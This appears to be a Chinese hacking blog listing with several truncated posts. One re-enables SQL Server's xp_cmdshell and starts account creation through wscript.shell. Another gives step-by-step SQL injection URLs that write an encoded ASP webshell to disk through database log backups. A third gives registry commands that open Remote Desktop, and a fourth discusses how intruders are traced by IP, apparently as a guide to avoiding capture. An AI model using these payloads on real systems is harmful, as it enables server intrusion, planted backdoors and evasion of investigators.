Blog

方法1:查询分离器连接后
第一步执行：use master
第二步执行：sp_dropextendedproc 'xp_cmdshell'
然后按F5键命令执行完毕

[H1]常见情况恢复执行xp_cmdshell.[/H1]
1 未能找到存储过程'master..xpcmdshell'.
恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
第一步执行：sp_dropextendedproc "xp_cmdshell"
第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕

[H1]终极方法.[/H1]
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shel ... Read more »

现在我们大部分同志备份拿WEBSHELL都是使用工具,下面来看看我们经常使用的方法
第 一 步:
http://192.168.0.2/news.asp?id=1;create table [dbo].[shit_tmp] ([cmd] [image])--
第 二 步
http://192.168.0.2/news.asp?id=1;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate--
第 三 步
http://192.168.0.2/news.asp?id=1;insert into [shit_tmp](cmd) values(0x3C25657865637574652872657175657374282261222929253E)--
第 四 步
http://192.168.0.2/news.asp?id=1;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x64003A005C003100320033002E00610073007000 backup log @a to disk=@s with init,no_truncate--
第 五 步
http://192.168.0.2/news.asp?id=1;Drop table [shit_tmp]--
第一步建表,第二步备份之前的数据,相当于下一个断点,第三步插入数据,第四步再次差异备份,得到WEBSHELL第五步,删除表
先来分析一下这种方法,差异备份其实备份的并不是数据，而是备份对表操作的ＳＱＬ语句，比方说上面这个方法他备分得到的小马来源并不是来源于数据，而是来源于第三步的语句，第三步中呢重点又在于后面的小马，并不在于方法，所以我也就想到了在利用UPDATE来代替INSERT
得用update的好处在于省略了第一步和第五步，坏处在于，你需要找一张表来代替新建的表，
第 一 步
h ... Read more »

组策略可以直接启动termservice，只需修改注册表一个地方：
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /F
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0
执行后3389就会打开，对于各种windows系统均适用，且不用重启。

俗语有云：天网恢恢、疏而不漏！这句话是真的么？现实社会中我不知道。但是在互联网上，这句话在Internet上是很软弱的。读完我这篇文，就可以知道。在网络上触犯现行法律，即便于公安部门立案调查，未必就"落入法网” 注：本文仅做技术研讨，并非讨论如何在犯罪后逃脱法律的惩罚。
当你侵入一台服务器呢？在你进入服务器的时候，首先WINDOWS系统就会对你的连接IP进行记录，其次在网关服务器上。也会记录连接进入服务器的IP。所以即便于你能够把服务器上的记录给删除，而网关上的记录，你永远也碰不到。
公安部门在锁定做案者的时候，首先就是要找到做案者，如何找到？最重要的就是追踪IP了。
我们来了解下一些ADSL宽带接入常识。
众所周知，现在大家一般都是使用的ADSL电信或者网通的宽带接入网络。绝大部分是使用的动态IP，少部分是使用的固定IP。固定IP是特性一般是带宽在4M以上。而一般人用不了。当你启动计算机，通过ISP提供给你的宽带ADSL帐号拨进互联网的时候。ISP服务商的系统就会随机分配给你一个动态IP，并且记录如下事件，例如：2008年8月8日8时8分8秒，btm4545455（宽带帐号）,拨入IP：58.53.1.5，操作系统： Windowsxp，拨号电话：07281234567。各省的电信记录方式可能不同，但是这些数据绝对会被ISP记录下来，有的人可能不相信ISP会记录这么详细的内容。不过我进入电信网络中查看过这种系统，确实存在！而且更详细，我这里只是简单列举了他记录的一些主要数据！
另外一点，当你成功拨号进入互联网后，你的IP在访问互联网的时候，会经过不少路由器，几乎每个路由器都会记录下你的IP！
现在大家知道了ISP服务商通过什么方式记录你的行踪了吧？
我们再谈谈公安部门如何抓捕做案者。大家都知道，要抓一个人，首先就要知道他是谁、他在那里。如果这都不知道，怎么抓？而要获取到作案者地理位置和真实身份的唯一手段，就是"IP”，IP就是ISP分配给大家用来上网的东东。大家都知道，当你的计算机和一台Internet上的服务器建立连接的时候，双方就会互相传输数据给对方。而这个IP就等于是传输的通道，其实你使用的IP，只能说是互联网的"身份证”，真正访问互联网资源的其实是ISP，你的IP只是负责接受和传输数据到XX服 ... Read more »